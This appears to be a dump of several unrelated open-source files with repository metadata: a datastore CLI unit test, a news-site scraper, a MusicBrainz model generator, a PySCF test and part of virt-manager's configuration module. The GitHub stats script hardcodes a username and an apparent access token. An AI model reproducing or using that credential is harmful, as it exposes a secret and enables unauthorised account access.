snapshot.snapshot_dir = args['snapshot_dir'] or config.get('snapshotDirectory', snapshot.snapshot_dir)
main()
|
mit
| -5,159,026,592,452,285,000
| 36.979592
| 201
| 0.671145
| false
| 3.645446
| true
| false
| false
|
sirca/bdkd_datastore
|
datastore/tests/unit/bdkd/datastore/util/test_copy_move.py
|
1
|
3291
|
# Copyright 2015 Nicta
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding=utf-8
import unittest
import argparse
import os
# Load a custom configuration for unit testing
os.environ['BDKD_DATASTORE_CONFIG'] = os.path.join(
os.path.dirname(__file__), '..', '..', '..', 'conf', 'test.conf')
from bdkd.datastore.util import ds_util
FIXTURES = os.path.join(os.path.dirname(__file__),
'..', '..', '..', '..', 'fixtures')
class CopyMoveUtilitiesTest(unittest.TestCase):
def setUp(self):
self.filepath = os.path.join(FIXTURES, 'FeatureCollections', 'Coastlines',
'Seton_etal_ESR2012_Coastlines_2012.1.gpmlz')
self.parser = argparse.ArgumentParser()
subparser = self.parser.add_subparsers(dest='subcmd')
ds_util._create_subparsers(subparser)
def test_copy_same_repository_arguments(self):
args_in = [ 'copy', 'test-repository', 'from_resource', 'to_resource' ]
args = self.parser.parse_args(args_in)
self.assertTrue(args)
self.assertEquals(args.from_repository.name, 'test-repository')
self.assertEquals(args.from_resource_name, 'from_resource')
self.assertEquals(args.to_repository, None)
self.assertEquals(args.to_resource_name, 'to_resource')
def test_copy_across_repositories_arguments(self):
args_in = [ 'copy', 'test-repository', 'from_resource', 'test-repository',
'to_resource' ]
args = self.parser.parse_args(args_in)
self.assertTrue(args)
self.assertEquals(args.from_repository.name, 'test-repository')
self.assertEquals(args.from_resource_name, 'from_resource')
self.assertEquals(args.to_repository.name, 'test-repository')
self.assertEquals(args.to_resource_name, 'to_resource')
def test_move_same_repository_arguments(self):
args_in = [ 'move', 'test-repository', 'from_resource', 'to_resource' ]
args = self.parser.parse_args(args_in)
self.assertTrue(args)
self.assertEquals(args.from_repository.name, 'test-repository')
self.assertEquals(args.from_resource_name, 'from_resource')
self.assertEquals(args.to_repository, None)
self.assertEquals(args.to_resource_name, 'to_resource')
def test_move_across_repositories_arguments(self):
args_in = [ 'move', 'test-repository', 'from_resource', 'test-repository',
'to_resource' ]
args = self.parser.parse_args(args_in)
self.assertTrue(args)
self.assertEquals(args.from_repository.name, 'test-repository')
self.assertEquals(args.from_resource_name, 'from_resource')
self.assertEquals(args.to_repository.name, 'test-repository')
self.assertEquals(args.to_resource_name, 'to_resource')
|
apache-2.0
| -4,339,567,989,079,044,000
| 40.658228
| 83
| 0.675175
| false
| 3.710259
| true
| false
| false
|
HIIT/mediacollection
|
sites/helsinginuutiset.py
|
1
|
1658
|
# -*- coding: utf-8 -*-
import requests
from bs4 import BeautifulSoup
import processor
from datetime import datetime
def parse( url ):
r = requests.get( url )
if r.status_code == 404:
return processor.create_dictionary('', url, r.status_code, [u''], [u''], u'', u'', u'', u'', [u''], [u''])
r.encoding = 'UTF-8'
soup = BeautifulSoup( r.text, "html.parser" )
article = soup.find( 'article' )
if article == None:
return processor.create_dictionary('', url, r.status_code, [u''], [u''], u'', u'', u'', u'', [u''], [u''])
processor.decompose_all( article.find_all( 'script' ) )
departments = article.find( class_ = 'field-name-field-department-tref' )
categories = processor.collect_categories( departments.find_all( 'a' ) )
datetime_list = processor.collect_datetime( article.find( class_ = 'field-name-post-date' ) )
author = article.find( class_ = 'author' )
if author != None:
processor.decompose( author.find( class_ = 'img' ) )
author = processor.collect_text( author.find( 'h3' ) )
else:
author = u''
title = processor.collect_text( article.find( 'h1' ) )
text = processor.collect_text( article.find( class_ = 'field field-name-body' ) )
images = processor.collect_images_by_parent( article.find_all( class_ = 'img' ), '')
captions = processor.collect_image_captions( article.find_all( class_ = 'caption' ) )
return processor.create_dictionary('Helsingin uutiset', url, r.status_code, categories, datetime_list, author, title, u'', text, images, captions)
if __name__ == '__main__':
parse("http://www.helsinginuutiset.fi/artikkeli/433833-arvio-15-000-ihmista-saa-tana-vuonna-tyopaikan-kunnasta-tarvetta-etenkin")
|
mit
| 8,901,220,503,216,206,000
| 36.681818
| 147
| 0.670084
| false
| 2.883478
| false
| false
| false
|
flrvm/cobratoolbox
|
.github/github_stats.py
|
1
|
1459
|
from github import Github
g = Github("cobrabot", "dd31ac21736aeeaeac764ce1192c17e370679a25")
cobratoolbox = g.get_user("opencobra").get_repo("cobratoolbox")
contributors = {}
for contributor in cobratoolbox.get_stats_contributors():
a = 0
d = 0
c = 0
for week in contributor.weeks:
a += week.a
d += week.d
c += week.c
contributors[contributor.author.login] = {
'additions': a, 'deletions': d, 'commits': c, 'avatar': contributor.author.avatar_url}
print "name: %20s, additions: %10d, deletions: %10d, commits: %10d" % (contributor.author.login, a, d, c)
sorted_by_commits = sorted(contributors.items(), key=lambda x: x[1]['commits'])
table = '\n.. raw:: html\n\n <table style="margin:0px auto" width="100%">'
for k in range(0, 5):
table += """\n
<tr>
<td width="46px"><img src="%s" width=46 height=46 alt=""></td><td><a href="https://github.com/%s">%s</a></td>
<td width="46px"><img src="%s" width=46 height=46 alt=""></td><td><a href="https://github.com/%s">%s</a></td>
</tr>""" % (sorted_by_commits[-(2 * k + 1)][1]['avatar'], sorted_by_commits[-(2 * k + 1)][0], sorted_by_commits[-(2 * k + 1)][0],
sorted_by_commits[-(2 * (k + 1))][1]['avatar'], sorted_by_commits[-(2 * (k + 1))][0], sorted_by_commits[-(2 * (k + 1))][0])
table += "\n </table>"
with open("docs/source/contributors.rst", "w") as readme:
readme.write(table)
|
gpl-3.0
| 1,395,502,001,221,579,800
| 40.685714
| 137
| 0.58122
| false
| 2.838521
| false
| false
| false
|
marios-zindilis/musicbrainz-django-models
|
_build/model.py
|
1
|
3430
|
#!/usr/bin/env python3
import sys
try:
MODEL_NAME = sys.argv[1]
except IndexError:
print('Model Name Not Provided')
exit(1)
MODEL_NAME_TITLE = MODEL_NAME.title().replace('_', ' ')
MODEL = 'musicbrainz_django_models/models/{}.py'.format(MODEL_NAME)
INIT = 'musicbrainz_django_models/models/__init__.py'
SQL = '_etc/CreateTables.sql'
SQL_EXISTS = False
SQL_TABLE = []
SQL_TABLE_INCLUDES_ID = False
SQL_TABLE_INCLUDES_GID = False
IMPORTS = [
'from django.db import models',
'from django.utils.encoding import python_2_unicode_compatible',
]
FIELDS = []
GID_DOC = ''
MODELS = []
MODEL_TEMPLATE = '''"""
.. module:: {MODEL_NAME}
The **{MODEL_NAME_TITLE}** Model.
PostgreSQL Definition
---------------------
The :code:`{MODEL_NAME}` table is defined in the MusicBrainz Server as:
.. code-block:: sql
{SQL_TABLE}
"""
{IMPORTS}
@python_2_unicode_compatible
class {MODEL_NAME}(models.Model):
"""
Not all parameters are listed here, only those that present some interest
in their Django implementation.
{GID_DOC}
"""
{FIELDS}
def __str__(self):
return self.name
class Meta:
db_table = '{MODEL_NAME}'
'''
with open(SQL, 'r') as sql:
for line in sql:
if (
line.startswith('CREATE TABLE {} '.format(MODEL_NAME)) or
line == 'CREATE TABLE {}\n'.format(MODEL_NAME)
):
SQL_EXISTS = True
break
if not SQL_EXISTS:
print('CREATE TABLE {} Not Found'.format(MODEL_NAME))
exit(1)
with open(SQL, 'r') as sql:
SQL_TABLE_CAPTURE = False
for line in sql:
if (
line.startswith('CREATE TABLE {} '.format(MODEL_NAME)) or
line == 'CREATE TABLE {}\n'.format(MODEL_NAME)
):
SQL_TABLE_CAPTURE = True
if SQL_TABLE_CAPTURE and line.startswith(');'):
SQL_TABLE.append(line)
SQL_TABLE_CAPTURE = False
break
if SQL_TABLE_CAPTURE:
if not SQL_TABLE_INCLUDES_ID:
SQL_TABLE_INCLUDES_ID = ' serial,' in line.lower()
if not SQL_TABLE_INCLUDES_GID:
SQL_TABLE_INCLUDES_GID = ' uuid ' in line.lower()
SQL_TABLE.append(line)
if SQL_TABLE_INCLUDES_ID:
FIELDS.append(' id = models.AutoField(primary_key=True)')
if SQL_TABLE_INCLUDES_GID:
IMPORTS.append('import uuid')
FIELDS.append(' gid = models.UUIDField(default=uuid.uuid4)')
GID_DOC = """:param gid: this is interesting because it cannot be NULL but a default is
not defined in SQL. The default `uuid.uuid4` in Django will generate a
UUID during the creation of an instance."""
with open(MODEL, 'w') as model:
model.write(MODEL_TEMPLATE.format(
MODEL_NAME=MODEL_NAME,
MODEL_NAME_TITLE=MODEL_NAME_TITLE,
SQL_TABLE=' '.join(SQL_TABLE),
IMPORTS='\n'.join(IMPORTS),
FIELDS='\n'.join(FIELDS),
GID_DOC=GID_DOC
))
with open(INIT, 'r') as init:
MODELS = [line.split()[-1] for line in init if line.startswith('from ')]
MODELS.append(MODEL_NAME)
with open(INIT, 'w') as init:
for mod in MODELS:
init.write('from .{mod} import {mod}\n'.format(mod=mod))
init.write('\n')
init.write('# __all__ silences PEP8 `module imported but unused`:\n')
init.write('__all__ = [\n')
for mod in MODELS:
init.write(' {mod},\n'.format(mod=mod))
init.write(']\n')
|
gpl-2.0
| -6,831,984,093,304,596,000
| 26.66129
| 91
| 0.6
| false
| 3.298077
| false
| false
| false
|
sunqm/pyscf
|
pyscf/eph/test/test_uhf.py
|
1
|
2089
|
#!/usr/bin/env python
# Copyright 2014-2020 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from pyscf import scf, gto
from pyscf.eph import eph_fd, uhf
import numpy as np
import unittest
mol = gto.M()
mol.atom = [['O', [0.000000000000, -0.000000000775, 0.923671924285]],
['H', [-0.000000000000, -1.432564848017, 2.125164039823]],
['H', [0.000000000000, 1.432564848792, 2.125164035930]]]
mol.unit = 'Bohr'
mol.basis = 'sto3g'
mol.verbose=4
mol.build() # this is a pre-computed relaxed geometry
class KnownValues(unittest.TestCase):
def test_finite_diff_uhf_eph(self):
mf = scf.UHF(mol)
mf.conv_tol = 1e-16
mf.conv_tol_grad = 1e-10
mf.kernel()
grad = mf.nuc_grad_method().kernel()
self.assertTrue(abs(grad).max()<1e-5)
mat, omega = eph_fd.kernel(mf)
matmo, _ = eph_fd.kernel(mf, mo_rep=True)
myeph = uhf.EPH(mf)
eph, _ = myeph.kernel()
ephmo, _ = myeph.kernel(mo_rep=True)
for i in range(len(omega)):
self.assertTrue(min(np.linalg.norm(eph[:,i]-mat[:,i]),np.linalg.norm(eph[:,i]+mat[:,i]))<1e-5)
self.assertTrue(min(abs(eph[:,i]-mat[:,i]).max(), abs(eph[:,i]+mat[:,i]).max())<1e-5)
self.assertTrue(min(np.linalg.norm(ephmo[:,i]-matmo[:,i]),np.linalg.norm(ephmo[:,i]+matmo[:,i]))<1e-5)
self.assertTrue(min(abs(ephmo[:,i]-matmo[:,i]).max(), abs(ephmo[:,i]+matmo[:,i]).max())<1e-5)
if __name__ == '__main__':
print("Full Tests for UHF")
unittest.main()
|
apache-2.0
| -3,297,742,572,155,970,000
| 36.981818
| 114
| 0.632839
| false
| 2.97155
| true
| false
| false
|
noskill/virt-manager
|
virtManager/config.py
|
1
|
25087
|
#
# Copyright (C) 2006, 2012-2014 Red Hat, Inc.
# Copyright (C) 2006 Daniel P. Berrange <berrange@redhat.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301 USA.
#
import os
import logging
from gi.repository import Gio
from gi.repository import GLib
from gi.repository import Gtk
from virtinst import CPU
from .keyring import vmmKeyring, vmmSecret
running_config = None
class SettingsWrapper(object):
def __init__(self, settings_id):
self._root = settings_id
self._settings = Gio.Settings.new(self._root)
self._settingsmap = {"": self._settings}
self._handler_map = {}
for child in self._settings.list_children():
childschema = self._root + "." + child
self._settingsmap[child] = Gio.Settings.new(childschema)
def _parse_key(self, key):
value = key.strip("/")
settingskey = ""
if "/" in value:
settingskey, value = value.rsplit("/", 1)
return settingskey, value
def make_vm_settings(self, key):
settingskey = self._parse_key(key)[0]
if settingskey in self._settingsmap:
return True
schema = self._root + ".vm"
path = "/" + self._root.replace(".", "/") + key.rsplit("/", 1)[0] + "/"
self._settingsmap[settingskey] = Gio.Settings.new_with_path(schema,
path)
return True
def _find_settings(self, key):
settingskey, value = self._parse_key(key)
return self._settingsmap[settingskey], value
def _cmd_helper(self, cmd, key, *args, **kwargs):
settings, key = self._find_settings(key)
return getattr(settings, cmd)(key, *args, **kwargs)
def notify_add(self, key, cb, *args, **kwargs):
settings, key = self._find_settings(key)
def wrapcb(*ignore):
return cb(*args, **kwargs)
ret = settings.connect("changed::%s" % key, wrapcb, *args, **kwargs)
self._handler_map[ret] = settings
return ret
def notify_remove(self, h):
settings = self._handler_map.pop(h)
return settings.disconnect(h)
def get(self, key):
return self._cmd_helper("get_value", key).unpack()
def set(self, key, value, *args, **kwargs):
fmt = self._cmd_helper("get_value", key).get_type_string()
return self._cmd_helper("set_value", key,
GLib.Variant(fmt, value),
*args, **kwargs)
class vmmConfig(object):
# key names for saving last used paths
CONFIG_DIR_IMAGE = "image"
CONFIG_DIR_ISO_MEDIA = "isomedia"
CONFIG_DIR_FLOPPY_MEDIA = "floppymedia"
CONFIG_DIR_SAVE = "save"
CONFIG_DIR_RESTORE = "restore"
CONFIG_DIR_SCREENSHOT = "screenshot"
CONFIG_DIR_FS = "fs"
# Metadata mapping for browse types. Prob shouldn't go here, but works
# for now.
browse_reason_data = {
CONFIG_DIR_IMAGE : {
"enable_create" : True,
"storage_title" : _("Locate or create storage volume"),
"local_title" : _("Locate existing storage"),
"dialog_type" : Gtk.FileChooserAction.SAVE,
"choose_button" : Gtk.STOCK_OPEN,
},
CONFIG_DIR_ISO_MEDIA : {
"enable_create" : False,
"storage_title" : _("Locate ISO media volume"),
"local_title" : _("Locate ISO media"),
},
CONFIG_DIR_FLOPPY_MEDIA : {
"enable_create" : False,
"storage_title" : _("Locate floppy media volume"),
"local_title" : _("Locate floppy media"),
},
CONFIG_DIR_FS : {
"enable_create" : False,
"storage_title" : _("Locate directory volume"),
"local_title" : _("Locate directory volume"),
"dialog_type" : Gtk.FileChooserAction.SELECT_FOLDER,
},
}
CONSOLE_SCALE_NEVER = 0
CONSOLE_SCALE_FULLSCREEN = 1
CONSOLE_SCALE_ALWAYS = 2
DEFAULT_XEN_IMAGE_DIR = "/var/lib/xen/images"
DEFAULT_XEN_SAVE_DIR = "/var/lib/xen/dump"
DEFAULT_VIRT_IMAGE_DIR = "/var/lib/libvirt/images"
DEFAULT_VIRT_SAVE_DIR = "/var/lib/libvirt"
def __init__(self, appname, cliconfig, test_first_run=False):
self.appname = appname
self.appversion = cliconfig.__version__
self.conf_dir = "/org/virt-manager/%s/" % self.appname
self.ui_dir = os.path.join(cliconfig.asset_dir, "ui")
self.test_first_run = bool(test_first_run)
self.conf = SettingsWrapper("org.virt-manager.virt-manager")
# We don't create it straight away, since we don't want
# to block the app pending user authorization to access
# the keyring
self.keyring = None
self.default_qemu_user = cliconfig.default_qemu_user
self.stable_defaults = cliconfig.stable_defaults
self.preferred_distros = cliconfig.preferred_distros
self.hv_packages = cliconfig.hv_packages
self.libvirt_packages = cliconfig.libvirt_packages
self.askpass_package = cliconfig.askpass_package
self.default_graphics_from_config = cliconfig.default_graphics
self.with_bhyve = cliconfig.with_bhyve
self.cli_usbredir = None
self.default_storage_format_from_config = "qcow2"
self.cpu_default_from_config = "host-cpu-model"
self.default_console_resizeguest = 0
self.default_add_spice_usbredir = "yes"
self._objects = []
self.support_inspection = self.check_inspection()
self._spice_error = None
global running_config
running_config = self
def check_inspection(self):
try:
# Check we can open the Python guestfs module.
from guestfs import GuestFS # pylint: disable=import-error
GuestFS(close_on_exit=False)
return True
except:
return False
# General app wide helpers (gsettings agnostic)
def get_appname(self):
return self.appname
def get_appversion(self):
return self.appversion
def get_ui_dir(self):
return self.ui_dir
def embeddable_graphics(self):
ret = ["vnc", "spice"]
return ret
def remove_notifier(self, h):
self.conf.notify_remove(h)
# Used for debugging reference leaks, we keep track of all objects
# come and go so we can do a leak report at app shutdown
def add_object(self, obj):
self._objects.append(obj)
def remove_object(self, obj):
self._objects.remove(obj)
def get_objects(self):
return self._objects[:]
def _make_pervm_key(self, uuid, key):
return "/vms/%s%s" % (uuid.replace("-", ""), key)
def listen_pervm(self, uuid, key, *args, **kwargs):
key = self._make_pervm_key(uuid, key)
self.conf.make_vm_settings(key)
return self.conf.notify_add(key, *args, **kwargs)
def set_pervm(self, uuid, key, *args, **kwargs):
key = self._make_pervm_key(uuid, key)
self.conf.make_vm_settings(key)
ret = self.conf.set(key, *args, **kwargs)
return ret
def get_pervm(self, uuid, key):
key = self._make_pervm_key(uuid, key)
self.conf.make_vm_settings(key)
return self.conf.get(key)
###################
# General helpers #
###################
# Manager stats view preferences
def is_vmlist_guest_cpu_usage_visible(self):
return self.conf.get("/vmlist-fields/cpu-usage")
def is_vmlist_host_cpu_usage_visible(self):
return self.conf.get("/vmlist-fields/host-cpu-usage")
def is_vmlist_memory_usage_visible(self):
return self.conf.get("/vmlist-fields/memory-usage")
def is_vmlist_disk_io_visible(self):
return self.conf.get("/vmlist-fields/disk-usage")
def is_vmlist_network_traffic_visible(self):
return self.conf.get("/vmlist-fields/network-traffic")
def set_vmlist_guest_cpu_usage_visible(self, state):
self.conf.set("/vmlist-fields/cpu-usage", state)
def set_vmlist_host_cpu_usage_visible(self, state):
self.conf.set("/vmlist-fields/host-cpu-usage", state)
def set_vmlist_memory_usage_visible(self, state):
self.conf.set("/vmlist-fields/memory-usage", state)
def set_vmlist_disk_io_visible(self, state):
self.conf.set("/vmlist-fields/disk-usage", state)
def set_vmlist_network_traffic_visible(self, state):
self.conf.set("/vmlist-fields/network-traffic", state)
def on_vmlist_guest_cpu_usage_visible_changed(self, cb):
return self.conf.notify_add("/vmlist-fields/cpu-usage", cb)
def on_vmlist_host_cpu_usage_visible_changed(self, cb):
return self.conf.notify_add("/vmlist-fields/host-cpu-usage", cb)
def on_vmlist_memory_usage_visible_changed(self, cb):
return self.conf.notify_add("/vmlist-fields/memory-usage", cb)
def on_vmlist_disk_io_visible_changed(self, cb):
return self.conf.notify_add("/vmlist-fields/disk-usage", cb)
def on_vmlist_network_traffic_visible_changed(self, cb):
return self.conf.notify_add("/vmlist-fields/network-traffic", cb)
# Keys preferences
def get_keys_combination(self):
ret = self.conf.get("/console/grab-keys")
if not ret:
# Left Control + Left Alt
return "65507,65513"
return ret
def set_keys_combination(self, val):
# Val have to be a list of integers
val = ','.join([str(v) for v in val])
self.conf.set("/console/grab-keys", val)
def on_keys_combination_changed(self, cb):
return self.conf.notify_add("/console/grab-keys", cb)
# This key is not intended to be exposed in the UI yet
def get_keyboard_grab_default(self):
return self.conf.get("/console/grab-keyboard")
def set_keyboard_grab_default(self, val):
self.conf.set("/console/grab-keyboard", val)
def on_keyboard_grab_default_changed(self, cb):
return self.conf.notify_add("/console/grab-keyboard", cb)
# Confirmation preferences
def get_confirm_forcepoweroff(self):
return self.conf.get("/confirm/forcepoweroff")
def get_confirm_poweroff(self):
return self.conf.get("/confirm/poweroff")
def get_confirm_pause(self):
return self.conf.get("/confirm/pause")
def get_confirm_removedev(self):
return self.conf.get("/confirm/removedev")
def get_confirm_interface(self):
return self.conf.get("/confirm/interface-power")
def get_confirm_unapplied(self):
return self.conf.get("/confirm/unapplied-dev")
def get_confirm_delstorage(self):
return self.conf.get("/confirm/delete-storage")
def set_confirm_forcepoweroff(self, val):
self.conf.set("/confirm/forcepoweroff", val)
def set_confirm_poweroff(self, val):
self.conf.set("/confirm/poweroff", val)
def set_confirm_pause(self, val):
self.conf.set("/confirm/pause", val)
def set_confirm_removedev(self, val):
self.conf.set("/confirm/removedev", val)
def set_confirm_interface(self, val):
self.conf.set("/confirm/interface-power", val)
def set_confirm_unapplied(self, val):
self.conf.set("/confirm/unapplied-dev", val)
def set_confirm_delstorage(self, val):
self.conf.set("/confirm/delete-storage", val)
# System tray visibility
def on_view_system_tray_changed(self, cb):
return self.conf.notify_add("/system-tray", cb)
def get_view_system_tray(self):
return self.conf.get("/system-tray")
def set_view_system_tray(self, val):
self.conf.set("/system-tray", val)
# Stats history and interval length
def get_stats_history_length(self):
return 120
def get_stats_update_interval(self):
interval = self.conf.get("/stats/update-interval")
if interval < 1:
return 1
return interval
def set_stats_update_interval(self, interval):
self.conf.set("/stats/update-interval", interval)
def on_stats_update_interval_changed(self, cb):
return self.conf.notify_add("/stats/update-interval", cb)
# Disable/Enable different stats polling
def get_stats_enable_cpu_poll(self):
return self.conf.get("/stats/enable-cpu-poll")
def get_stats_enable_disk_poll(self):
return self.conf.get("/stats/enable-disk-poll")
def get_stats_enable_net_poll(self):
return self.conf.get("/stats/enable-net-poll")
def get_stats_enable_memory_poll(self):
return self.conf.get("/stats/enable-memory-poll")
def set_stats_enable_cpu_poll(self, val):
self.conf.set("/stats/enable-cpu-poll", val)
def set_stats_enable_disk_poll(self, val):
self.conf.set("/stats/enable-disk-poll", val)
def set_stats_enable_net_poll(self, val):
self.conf.set("/stats/enable-net-poll", val)
def set_stats_enable_memory_poll(self, val):
self.conf.set("/stats/enable-memory-poll", val)
def on_stats_enable_cpu_poll_changed(self, cb, row=None):
return self.conf.notify_add("/stats/enable-cpu-poll", cb, row)
def on_stats_enable_disk_poll_changed(self, cb, row=None):
return self.conf.notify_add("/stats/enable-disk-poll", cb, row)
def on_stats_enable_net_poll_changed(self, cb, row=None):
return self.conf.notify_add("/stats/enable-net-poll", cb, row)
def on_stats_enable_memory_poll_changed(self, cb, row=None):
return self.conf.notify_add("/stats/enable-memory-poll", cb, row)
# VM Console preferences
def on_console_accels_changed(self, cb):
return self.conf.notify_add("/console/enable-accels", cb)
def get_console_accels(self):
console_pref = self.conf.get("/console/enable-accels")
if console_pref is None:
console_pref = False
return console_pref
def set_console_accels(self, pref):
self.conf.set("/console/enable-accels", pref)
def on_console_scaling_changed(self, cb):
return self.conf.notify_add("/console/scaling", cb)
def get_console_scaling(self):
return self.conf.get("/console/scaling")
def set_console_scaling(self, pref):
self.conf.set("/console/scaling", pref)
def on_console_resizeguest_changed(self, cb):
return self.conf.notify_add("/console/resize-guest", cb)
def get_console_resizeguest(self):
val = self.conf.get("/console/resize-guest")
if val == -1:
val = self.default_console_resizeguest
return val
def set_console_resizeguest(self, pref):
self.conf.set("/console/resize-guest", pref)
def get_auto_redirection(self):
if self.cli_usbredir is not None:
return self.cli_usbredir
return self.conf.get("/console/auto-redirect")
def set_auto_redirection(self, state):
self.conf.set("/console/auto-redirect", state)
# Show VM details toolbar
def get_details_show_toolbar(self):
res = self.conf.get("/details/show-toolbar")
if res is None:
res = True
return res
def set_details_show_toolbar(self, state):
self.conf.set("/details/show-toolbar", state)
# VM details default size
def get_details_window_size(self):
w = self.conf.get("/details/window_width")
h = self.conf.get("/details/window_height")
return (w, h)
def set_details_window_size(self, w, h):
self.conf.set("/details/window_width", w)
self.conf.set("/details/window_height", h)
# New VM preferences
def get_new_vm_sound(self):
return self.conf.get("/new-vm/add-sound")
def set_new_vm_sound(self, state):
self.conf.set("/new-vm/add-sound", state)
def get_graphics_type(self, raw=False):
ret = self.conf.get("/new-vm/graphics-type")
if ret not in ["system", "vnc", "spice"]:
ret = "system"
if ret == "system" and not raw:
return self.default_graphics_from_config
return ret
def set_graphics_type(self, gtype):
self.conf.set("/new-vm/graphics-type", gtype.lower())
def get_add_spice_usbredir(self, raw=False):
ret = self.conf.get("/new-vm/add-spice-usbredir")
if ret not in ["system", "yes", "no"]:
ret = "system"
if not raw and not self.get_graphics_type() == "spice":
return "no"
if ret == "system" and not raw:
return self.default_add_spice_usbredir
return ret
def set_add_spice_usbredir(self, val):
self.conf.set("/new-vm/add-spice-usbredir", val)
def get_default_storage_format(self, raw=False):
ret = self.conf.get("/new-vm/storage-format")
if ret not in ["default", "raw", "qcow2"]:
ret = "default"
if ret == "default" and not raw:
return self.default_storage_format_from_config
return ret
def set_storage_format(self, typ):
self.conf.set("/new-vm/storage-format", typ.lower())
def get_default_cpu_setting(self, raw=False, for_cpu=False):
ret = self.conf.get("/new-vm/cpu-default")
whitelist = [CPU.SPECIAL_MODE_HOST_MODEL_ONLY,
CPU.SPECIAL_MODE_HOST_MODEL,
CPU.SPECIAL_MODE_HV_DEFAULT]
if ret not in whitelist:
ret = "default"
if ret == "default" and not raw:
ret = self.cpu_default_from_config
if ret not in whitelist:
ret = whitelist[0]
if for_cpu and ret == CPU.SPECIAL_MODE_HOST_MODEL:
# host-model has known issues, so use our 'copy cpu'
# behavior until host-model does what we need
ret = CPU.SPECIAL_MODE_HOST_COPY
return ret
def set_default_cpu_setting(self, val):
self.conf.set("/new-vm/cpu-default", val.lower())
# URL/Media path history
def _url_add_helper(self, gsettings_path, url):
maxlength = 10
urls = self.conf.get(gsettings_path)
if urls is None:
urls = []
if urls.count(url) == 0 and len(url) > 0 and not url.isspace():
# The url isn't already in the list, so add it
urls.insert(0, url)
if len(urls) > maxlength:
del urls[len(urls) - 1]
self.conf.set(gsettings_path, urls)
def add_media_url(self, url):
self._url_add_helper("/urls/urls", url)
def add_kickstart_url(self, url):
self._url_add_helper("/urls/kickstarts", url)
def add_iso_path(self, path):
self._url_add_helper("/urls/isos", path)
def get_media_urls(self):
return self.conf.get("/urls/urls")
def get_kickstart_urls(self):
return self.conf.get("/urls/kickstarts")
def get_iso_paths(self):
return self.conf.get("/urls/isos")
# Whether to ask about fixing path permissions
def add_perms_fix_ignore(self, pathlist):
current_list = self.get_perms_fix_ignore() or []
for path in pathlist:
if path in current_list:
continue
current_list.append(path)
self.conf.set("/paths/perms-fix-ignore", current_list)
def get_perms_fix_ignore(self):
return self.conf.get("/paths/perms-fix-ignore")
# Manager view connection list
def add_conn(self, uri):
if self.test_first_run:
return
uris = self.conf.get("/connections/uris")
if uris is None:
uris = []
if uris.count(uri) == 0:
uris.insert(len(uris) - 1, uri)
self.conf.set("/connections/uris", uris)
def remove_conn(self, uri):
uris = self.conf.get("/connections/uris")
if uris is None:
return
if uris.count(uri) != 0:
uris.remove(uri)
self.conf.set("/connections/uris", uris)
if self.get_conn_autoconnect(uri):
uris = self.conf.get("/connections/autoconnect")
uris.remove(uri)
self.conf.set("/connections/autoconnect", uris)
def get_conn_uris(self):
if self.test_first_run:
return []
return self.conf.get("/connections/uris")
# Manager default window size
def get_manager_window_size(self):
w = self.conf.get("/manager-window-width")
h = self.conf.get("/manager-window-height")
return (w, h)
def set_manager_window_size(self, w, h):
self.conf.set("/manager-window-width", w)
self.conf.set("/manager-window-height", h)
# URI autoconnect
def get_conn_autoconnect(self, uri):
uris = self.conf.get("/connections/autoconnect")
return ((uris is not None) and (uri in uris))
def set_conn_autoconnect(self, uri, val):
if self.test_first_run:
return
uris = self.conf.get("/connections/autoconnect")
if uris is None:
uris = []
if not val and uri in uris:
uris.remove(uri)
elif val and uri not in uris:
uris.append(uri)
self.conf.set("/connections/autoconnect", uris)
# Default directory location dealings
def _get_default_dir_key(self, _type):
if (_type in [self.CONFIG_DIR_ISO_MEDIA,
self.CONFIG_DIR_FLOPPY_MEDIA]):
return "media"
if (_type in [self.CONFIG_DIR_IMAGE,
self.CONFIG_DIR_SCREENSHOT]):
return _type
return None
def get_default_directory(self, conn, _type):
key = self._get_default_dir_key(_type)
path = None
if key:
path = self.conf.get("/paths/%s-default" % key)
if not path:
if (_type == self.CONFIG_DIR_IMAGE or
_type == self.CONFIG_DIR_ISO_MEDIA or
_type == self.CONFIG_DIR_FLOPPY_MEDIA):
path = self.get_default_image_dir(conn)
if (_type == self.CONFIG_DIR_SAVE or
_type == self.CONFIG_DIR_RESTORE):
path = self.get_default_save_dir(conn)
logging.debug("directory for type=%s returning=%s", _type, path)
return path
def set_default_directory(self, folder, _type):
key = self._get_default_dir_key(_type)
if not key:
return
logging.debug("saving directory for type=%s to %s", key, folder)
self.conf.set("/paths/%s-default" % key, folder)
def get_default_image_dir(self, conn):
if conn.is_xen():
return self.DEFAULT_XEN_IMAGE_DIR
if (conn.is_qemu_session() or
not os.access(self.DEFAULT_VIRT_IMAGE_DIR, os.W_OK)):
return os.getcwd()
# Just return the default dir since the intention is that it
# is a managed pool and the user will be able to install to it.
return self.DEFAULT_VIRT_IMAGE_DIR
def get_default_save_dir(self, conn):
if conn.is_xen():
return self.DEFAULT_XEN_SAVE_DIR
elif os.access(self.DEFAULT_VIRT_SAVE_DIR, os.W_OK):
return self.DEFAULT_VIRT_SAVE_DIR
else:
return os.getcwd()
# Keyring / VNC password dealings
def get_secret_name(self, vm):
return "vm-console-" + vm.get_uuid()
def has_keyring(self):
if self.keyring is None:
self.keyring = vmmKeyring()
return self.keyring.is_available()
def get_console_password(self, vm):
if not self.has_keyring():
return ("", "")
username, keyid = vm.get_console_password()
if keyid == -1:
return ("", "")
